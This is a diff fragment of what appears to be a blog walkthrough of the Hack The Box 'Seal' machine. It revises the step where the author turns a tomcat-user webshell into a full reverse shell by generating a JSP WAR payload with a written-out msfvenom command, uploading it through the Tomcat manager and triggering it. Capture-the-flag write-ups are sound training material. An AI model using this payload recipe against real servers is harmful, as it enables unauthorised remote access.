jcseals/jcseals.github.io/_posts/2021-11-13-htb-seal-walkthrough.md

 We can see the whoami command being executed through our webshell, and it responds that we're running as the tomcat user.
 This is nice, but ideally we'd like a proper shell to interact with.

-Many ways to accomplish this, but I just wrote a simple shell script that creates a reverse shell when executed.
-I had some difficulties getting a reverse shell to come back to me from our webshell, so a simple solution is to create a war payload with msfvenom:
+Let's create a jsp reverse shell in war format with the msfvencom tool:
 ```text
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.26 LPORT=9002 -f war > runme.war
 Payload size: 1100 bytes
 Final size of war file: 1100 bytes
 ```

-I uploaded this payload the same way we did, through the tomcat manager UI, then went to that location: https://seal.htb/runme/
+I uploaded this payload the same way as before through the tomcat manager UI, then went to that location using the web browser to trigger the payload: https://seal.htb/runme/

 Our listener gets a hit and we have a shell: